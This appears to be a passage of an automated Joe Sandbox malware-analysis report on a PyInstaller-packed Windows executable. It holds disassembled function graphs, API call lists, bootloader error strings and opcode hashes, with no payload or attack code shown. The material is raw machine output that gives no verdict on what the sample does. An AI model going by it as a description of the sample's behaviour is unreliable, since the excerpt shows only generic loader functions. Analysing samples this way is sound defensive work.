                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction ID: 235a67f0b1412dbbdebda2e637d2da7591839ba84bc1f88a3a8e8885d7006363
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81D19432A08A8286F710EF34E8943ADB765FF94B58F800276DA5D43A98DF7CD154C721
                                                                                                                                                                                                                              Function 00007FF7EAD01000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff7ead01000-7ff7ead03806 call 7ff7ead0fe18 call 7ff7ead0fe20 call 7ff7ead0c850 call 7ff7ead153f0 call 7ff7ead15484 call 7ff7ead036b0 76 7ff7ead03814-7ff7ead03836 call 7ff7ead01950 62->76 77 7ff7ead03808-7ff7ead0380f 62->77 83 7ff7ead0383c-7ff7ead03856 call 7ff7ead01c80 76->83 84 7ff7ead0391b-7ff7ead03931 call 7ff7ead045c0 76->84 78 7ff7ead03c97-7ff7ead03cb2 call 7ff7ead0c550 77->78 88 7ff7ead0385b-7ff7ead0389b call 7ff7ead08830 83->88 89 7ff7ead03933-7ff7ead03960 call 7ff7ead07f90 84->89 90 7ff7ead0396a-7ff7ead0397f call 7ff7ead02710 84->90 95 7ff7ead038c1-7ff7ead038cc call 7ff7ead14f30 88->95 96 7ff7ead0389d-7ff7ead038a3 88->96 102 7ff7ead03984-7ff7ead039a6 call 7ff7ead01c80 89->102 103 7ff7ead03962-7ff7ead03965 call 7ff7ead1004c 89->103 104 7ff7ead03c8f 90->104 110 7ff7ead038d2-7ff7ead038e1 call 7ff7ead08830 95->110 111 7ff7ead039fc-7ff7ead03a2a call 7ff7ead08940 call 7ff7ead089a0 * 3 95->111 99 7ff7ead038a5-7ff7ead038ad 96->99 100 7ff7ead038af-7ff7ead038bd call 7ff7ead089a0 96->100 99->100 100->95 113 7ff7ead039b0-7ff7ead039b9 102->113 103->90 104->78 120 7ff7ead039f4-7ff7ead039f7 call 7ff7ead14f30 110->120 121 7ff7ead038e7-7ff7ead038ed 110->121 138 7ff7ead03a2f-7ff7ead03a3e call 7ff7ead08830 111->138 113->113 116 7ff7ead039bb-7ff7ead039d8 call 7ff7ead01950 113->116 116->88 127 7ff7ead039de-7ff7ead039ef call 7ff7ead02710 116->127 120->111 125 7ff7ead038f0-7ff7ead038fc 121->125 128 7ff7ead03905-7ff7ead03908 125->128 129 7ff7ead038fe-7ff7ead03903 125->129 127->104 128->120 132 7ff7ead0390e-7ff7ead03916 call 7ff7ead14f30 128->132 129->125 129->128 132->138 141 7ff7ead03b45-7ff7ead03b53 138->141 142 7ff7ead03a44-7ff7ead03a47 138->142 144 7ff7ead03b59-7ff7ead03b5d 141->144 145 7ff7ead03a67 141->145 142->141 143 7ff7ead03a4d-7ff7ead03a50 142->143 146 7ff7ead03a56-7ff7ead03a5a 143->146 147 7ff7ead03b14-7ff7ead03b17 143->147 148 7ff7ead03a6b-7ff7ead03a90 call 7ff7ead14f30 144->148 145->148 146->147 149 7ff7ead03a60 146->149 150 7ff7ead03b2f-7ff7ead03b40 call 7ff7ead02710 147->150 151 7ff7ead03b19-7ff7ead03b1d 147->151 157 7ff7ead03a92-7ff7ead03aa6 call 7ff7ead08940 148->157 158 7ff7ead03aab-7ff7ead03ac0 148->158 149->145 159 7ff7ead03c7f-7ff7ead03c87 150->159 151->150 153 7ff7ead03b1f-7ff7ead03b2a 151->153 153->148 157->158 161 7ff7ead03ac6-7ff7ead03aca 158->161 162 7ff7ead03be8-7ff7ead03bfa call 7ff7ead08830 158->162 159->104 163 7ff7ead03ad0-7ff7ead03ae8 call 7ff7ead15250 161->163 164 7ff7ead03bcd-7ff7ead03be2 call 7ff7ead01940 161->164 169 7ff7ead03c2e 162->169 170 7ff7ead03bfc-7ff7ead03c02 162->170 175 7ff7ead03b62-7ff7ead03b7a call 7ff7ead15250 163->175 176 7ff7ead03aea-7ff7ead03b02 call 7ff7ead15250 163->176 164->161 164->162 177 7ff7ead03c31-7ff7ead03c40 call 7ff7ead14f30 169->177 173 7ff7ead03c04-7ff7ead03c1c 170->173 174 7ff7ead03c1e-7ff7ead03c2c 170->174 173->177 174->177 184 7ff7ead03b7c-7ff7ead03b80 175->184 185 7ff7ead03b87-7ff7ead03b9f call 7ff7ead15250 175->185 176->164 186 7ff7ead03b08-7ff7ead03b0f 176->186 187 7ff7ead03c46-7ff7ead03c4a 177->187 188 7ff7ead03d41-7ff7ead03d63 call 7ff7ead044e0 177->188 184->185 197 7ff7ead03ba1-7ff7ead03ba5 185->197 198 7ff7ead03bac-7ff7ead03bc4 call 7ff7ead15250 185->198 186->164 190 7ff7ead03cd4-7ff7ead03ce6 call 7ff7ead08830 187->190 191 7ff7ead03c50-7ff7ead03c5f call 7ff7ead090e0 187->191 201 7ff7ead03d65-7ff7ead03d6f call 7ff7ead04630 188->201 202 7ff7ead03d71-7ff7ead03d82 call 7ff7ead01c80 188->202 207 7ff7ead03d35-7ff7ead03d3c 190->207 208 7ff7ead03ce8-7ff7ead03ceb 190->208 205 7ff7ead03cb3-7ff7ead03cb6 call 7ff7ead08660 191->205 206 7ff7ead03c61 191->206 197->198 198->164 219 7ff7ead03bc6 198->219 210 7ff7ead03d87-7ff7ead03d96 201->210 202->210 218 7ff7ead03cbb-7ff7ead03cbd 205->218 213 7ff7ead03c68 call 7ff7ead02710 206->213 207->213 208->207 214 7ff7ead03ced-7ff7ead03d10 call 7ff7ead01c80 208->214 216 7ff7ead03dc4-7ff7ead03dda call 7ff7ead09390 210->216 217 7ff7ead03d98-7ff7ead03d9f 210->217 227 7ff7ead03c6d-7ff7ead03c77 213->227 228 7ff7ead03d12-7ff7ead03d26 call 7ff7ead02710 call 7ff7ead14f30 214->228 229 7ff7ead03d2b-7ff7ead03d33 call 7ff7ead14f30 214->229 234 7ff7ead03ddc 216->234 235 7ff7ead03de8-7ff7ead03e04 SetDllDirectoryW 216->235 217->216 223 7ff7ead03da1-7ff7ead03da5 217->223 225 7ff7ead03cbf-7ff7ead03cc6 218->225 226 7ff7ead03cc8-7ff7ead03ccf 218->226 219->164 223->216 230 7ff7ead03da7-7ff7ead03dbe SetDllDirectoryW LoadLibraryExW 223->230 225->213 226->210 227->159 228->227 229->210 230->216 234->235 238 7ff7ead03f01-7ff7ead03f08 235->238 239 7ff7ead03e0a-7ff7ead03e19 call 7ff7ead08830 235->239 241 7ff7ead03f0e-7ff7ead03f15 238->241 242 7ff7ead04008-7ff7ead04010 238->242 251 7ff7ead03e32-7ff7ead03e3c call 7ff7ead14f30 239->251 252 7ff7ead03e1b-7ff7ead03e21 239->252 241->242 245 7ff7ead03f1b-7ff7ead03f25 call 7ff7ead033c0 241->245 246 7ff7ead04035-7ff7ead04067 call 7ff7ead036a0 call 7ff7ead03360 call 7ff7ead03670 call 7ff7ead06fc0 call 7ff7ead06d70 242->246 247 7ff7ead04012-7ff7ead0402f PostMessageW GetMessageW 242->247 245->227 259 7ff7ead03f2b-7ff7ead03f3f call 7ff7ead090c0 245->259 247->246 262 7ff7ead03ef2-7ff7ead03efc call 7ff7ead08940 251->262 263 7ff7ead03e42-7ff7ead03e48 251->263 253 7ff7ead03e23-7ff7ead03e2b 252->253 254 7ff7ead03e2d-7ff7ead03e2f 252->254 253->254 254->251 272 7ff7ead03f64-7ff7ead03fa0 call 7ff7ead08940 call 7ff7ead089e0 call 7ff7ead06fc0 call 7ff7ead06d70 call 7ff7ead088e0 259->272 273 7ff7ead03f41-7ff7ead03f5e PostMessageW GetMessageW 259->273 262->238 263->262 267 7ff7ead03e4e-7ff7ead03e54 263->267 270 7ff7ead03e56-7ff7ead03e58 267->270 271 7ff7ead03e5f-7ff7ead03e61 267->271 276 7ff7ead03e5a 270->276 277 7ff7ead03e67-7ff7ead03e83 call 7ff7ead06dc0 call 7ff7ead07340 270->277 271->238 271->277 308 7ff7ead03fa5-7ff7ead03fa7 272->308 273->272 276->238 290 7ff7ead03e85-7ff7ead03e8c 277->290 291 7ff7ead03e8e-7ff7ead03e95 277->291 292 7ff7ead03edb-7ff7ead03ef0 call 7ff7ead02a50 call 7ff7ead06fc0 call 7ff7ead06d70 290->292 293 7ff7ead03eaf-7ff7ead03eb9 call 7ff7ead071b0 291->293 294 7ff7ead03e97-7ff7ead03ea4 call 7ff7ead06e00 291->294 292->238 306 7ff7ead03ec4-7ff7ead03ed2 call 7ff7ead074f0 293->306 307 7ff7ead03ebb-7ff7ead03ec2 293->307 294->293 305 7ff7ead03ea6-7ff7ead03ead 294->305 305->292 306->238 319 7ff7ead03ed4 306->319 307->292 311 7ff7ead03ff5-7ff7ead04003 call 7ff7ead01900 308->311 312 7ff7ead03fa9-7ff7ead03fbf call 7ff7ead08ed0 call 7ff7ead088e0 308->312 311->227 312->311 323 7ff7ead03fc1-7ff7ead03fd6 312->323 319->292 324 7ff7ead03ff0 call 7ff7ead02a50 323->324 325 7ff7ead03fd8-7ff7ead03feb call 7ff7ead02710 call 7ff7ead01900 323->325 324->311 325->227
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                              • Instruction ID: 1110fc5f604bc3514105ae1ad6e894e3176ad781bc1424d71341d14022e255bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9327C21A08A8291FB19F72594943F9A762EF54788FC440B7DA5D432CAEF7CE558C332
                                                                                                                                                                                                                              Function 00007FF7EAD26964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 538 7ff7ead26964-7ff7ead269d7 call 7ff7ead26698 541 7ff7ead269d9-7ff7ead269e2 call 7ff7ead14ee8 538->541 542 7ff7ead269f1-7ff7ead269fb call 7ff7ead18520 538->542 547 7ff7ead269e5-7ff7ead269ec call 7ff7ead14f08 541->547 548 7ff7ead269fd-7ff7ead26a14 call 7ff7ead14ee8 call 7ff7ead14f08 542->548 549 7ff7ead26a16-7ff7ead26a7f CreateFileW 542->549 561 7ff7ead26d32-7ff7ead26d52 547->561 548->547 552 7ff7ead26afc-7ff7ead26b07 GetFileType 549->552 553 7ff7ead26a81-7ff7ead26a87 549->553 555 7ff7ead26b5a-7ff7ead26b61 552->555 556 7ff7ead26b09-7ff7ead26b44 GetLastError call 7ff7ead14e7c CloseHandle 552->556 558 7ff7ead26ac9-7ff7ead26af7 GetLastError call 7ff7ead14e7c 553->558 559 7ff7ead26a89-7ff7ead26a8d 553->559 564 7ff7ead26b69-7ff7ead26b6c 555->564 565 7ff7ead26b63-7ff7ead26b67 555->565 556->547 572 7ff7ead26b4a-7ff7ead26b55 call 7ff7ead14f08 556->572 558->547 559->558 566 7ff7ead26a8f-7ff7ead26ac7 CreateFileW 559->566 570 7ff7ead26b72-7ff7ead26bc7 call 7ff7ead18438 564->570 571 7ff7ead26b6e 564->571 565->570 566->552 566->558 576 7ff7ead26bc9-7ff7ead26bd5 call 7ff7ead268a0 570->576 577 7ff7ead26be6-7ff7ead26c17 call 7ff7ead26418 570->577 571->570 572->547 576->577 583 7ff7ead26bd7 576->583 584 7ff7ead26c19-7ff7ead26c1b 577->584 585 7ff7ead26c1d-7ff7ead26c5f 577->585 586 7ff7ead26bd9-7ff7ead26be1 call 7ff7ead1aac0 583->586 584->586 587 7ff7ead26c81-7ff7ead26c8c 585->587 588 7ff7ead26c61-7ff7ead26c65 585->588 586->561 589 7ff7ead26d30 587->589 590 7ff7ead26c92-7ff7ead26c96 587->590 588->587 592 7ff7ead26c67-7ff7ead26c7c 588->592 589->561 590->589 593 7ff7ead26c9c-7ff7ead26ce1 CloseHandle CreateFileW 590->593 592->587 595 7ff7ead26ce3-7ff7ead26d11 GetLastError call 7ff7ead14e7c call 7ff7ead18660 593->595 596 7ff7ead26d16-7ff7ead26d2b 593->596 595->596 596->589
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction ID: f9aed6a51e478cb4b00645d73990b07bc78f0d13bd230059b6e4c11a6b0e5bdb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC1D036B28B4285FB10EF64C4906AC7761F749B98F8142B6DE2E97398CF38D111C321
                                                                                                                                                                                                                              Function 00007FF7EAD083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD0842B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084AE
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084CD
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084DB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084EC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084F5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction ID: 583ef5b254f7ff1f7114440e18d99883d7db02a05b27b2c37a6eead3137a212d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4414121A0CA8285FA20EB24E4843BEB362FB94758FC00273D59D4269CEF7CE555C762
                                                                                                                                                                                                                              Function 00007FF7EAD09280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction ID: 8ce2ad7dbfd5054e07d43efbcfa513b8df1537611b836527035957cd2eb09776
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF0C232A1C74286F7A0DB60B4D8766B390FB84728F840336DA6D02AD8DF3CE058CA11
                                                                                                                                                                                                                              Function 00007FF7EAD01950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 331 7ff7ead01950-7ff7ead0198b call 7ff7ead045c0 334 7ff7ead01991-7ff7ead019d1 call 7ff7ead07f90 331->334 335 7ff7ead01c4e-7ff7ead01c72 call 7ff7ead0c550 331->335 340 7ff7ead01c3b-7ff7ead01c3e call 7ff7ead1004c 334->340 341 7ff7ead019d7-7ff7ead019e7 call 7ff7ead106d4 334->341 345 7ff7ead01c43-7ff7ead01c4b 340->345 346 7ff7ead019e9-7ff7ead01a03 call 7ff7ead14f08 call 7ff7ead02910 341->346 347 7ff7ead01a08-7ff7ead01a24 call 7ff7ead1039c 341->347 345->335 346->340 353 7ff7ead01a26-7ff7ead01a40 call 7ff7ead14f08 call 7ff7ead02910 347->353 354 7ff7ead01a45-7ff7ead01a5a call 7ff7ead14f28 347->354 353->340 360 7ff7ead01a5c-7ff7ead01a76 call 7ff7ead14f08 call 7ff7ead02910 354->360 361 7ff7ead01a7b-7ff7ead01afc call 7ff7ead01c80 * 2 call 7ff7ead106d4 354->361 360->340 373 7ff7ead01b01-7ff7ead01b14 call 7ff7ead14f44 361->373 376 7ff7ead01b16-7ff7ead01b30 call 7ff7ead14f08 call 7ff7ead02910 373->376 377 7ff7ead01b35-7ff7ead01b4e call 7ff7ead1039c 373->377 376->340 383 7ff7ead01b50-7ff7ead01b6a call 7ff7ead14f08 call 7ff7ead02910 377->383 384 7ff7ead01b6f-7ff7ead01b8b call 7ff7ead10110 377->384 383->340 390 7ff7ead01b9e-7ff7ead01bac 384->390 391 7ff7ead01b8d-7ff7ead01b99 call 7ff7ead02710 384->391 390->340 394 7ff7ead01bb2-7ff7ead01bb9 390->394 391->340 397 7ff7ead01bc1-7ff7ead01bc7 394->397 398 7ff7ead01be0-7ff7ead01bef 397->398 399 7ff7ead01bc9-7ff7ead01bd6 397->399 398->398 400 7ff7ead01bf1-7ff7ead01bfa 398->400 399->400 401 7ff7ead01c0f 400->401 402 7ff7ead01bfc-7ff7ead01bff 400->402 404 7ff7ead01c11-7ff7ead01c24 401->404 402->401 403 7ff7ead01c01-7ff7ead01c04 402->403 403->401 405 7ff7ead01c06-7ff7ead01c09 403->405 406 7ff7ead01c26 404->406 407 7ff7ead01c2d-7ff7ead01c39 404->407 405->401 408 7ff7ead01c0b-7ff7ead01c0d 405->408 406->407 407->340 407->397 408->404
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD07F90: _fread_nolock.LIBCMT ref: 00007FF7EAD0803A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF7EAD01A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                              • Instruction ID: 3adfd0fecca65c1dac41dd60b8d855fbfba640b4b7d0e82ba3b7333a87dcf31f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C817271A0868686FB20FB24D0853B9E3A2EF48748F844477E98D4778DDE7CE585C762
                                                                                                                                                                                                                              Function 00007FF7EAD01600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 409 7ff7ead01600-7ff7ead01611 410 7ff7ead01613-7ff7ead0161c call 7ff7ead01050 409->410 411 7ff7ead01637-7ff7ead01651 call 7ff7ead045c0 409->411 416 7ff7ead0162e-7ff7ead01636 410->416 417 7ff7ead0161e-7ff7ead01629 call 7ff7ead02710 410->417 418 7ff7ead01653-7ff7ead01681 call 7ff7ead14f08 call 7ff7ead02910 411->418 419 7ff7ead01682-7ff7ead0169c call 7ff7ead045c0 411->419 417->416 426 7ff7ead0169e-7ff7ead016b3 call 7ff7ead02710 419->426 427 7ff7ead016b8-7ff7ead016cf call 7ff7ead106d4 419->427 433 7ff7ead01821-7ff7ead01824 call 7ff7ead1004c 426->433 434 7ff7ead016d1-7ff7ead016f4 call 7ff7ead14f08 call 7ff7ead02910 427->434 435 7ff7ead016f9-7ff7ead016fd 427->435 440 7ff7ead01829-7ff7ead0183b 433->440 450 7ff7ead01819-7ff7ead0181c call 7ff7ead1004c 434->450 438 7ff7ead016ff-7ff7ead0170b call 7ff7ead01210 435->438 439 7ff7ead01717-7ff7ead01737 call 7ff7ead14f44 435->439 446 7ff7ead01710-7ff7ead01712 438->446 447 7ff7ead01761-7ff7ead0176c 439->447 448 7ff7ead01739-7ff7ead0175c call 7ff7ead14f08 call 7ff7ead02910 439->448 446->450 452 7ff7ead01802-7ff7ead0180a call 7ff7ead14f30 447->452 453 7ff7ead01772-7ff7ead01777 447->453 463 7ff7ead0180f-7ff7ead01814 448->463 450->433 452->463 456 7ff7ead01780-7ff7ead017a2 call 7ff7ead1039c 453->456 464 7ff7ead017a4-7ff7ead017bc call 7ff7ead10adc 456->464 465 7ff7ead017da-7ff7ead017e6 call 7ff7ead14f08 456->465 463->450 471 7ff7ead017c5-7ff7ead017d8 call 7ff7ead14f08 464->471 472 7ff7ead017be-7ff7ead017c1 464->472 470 7ff7ead017ed-7ff7ead017f8 call 7ff7ead02910 465->470 476 7ff7ead017fd 470->476 471->470 472->456 475 7ff7ead017c3 472->475 475->476 476->452
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
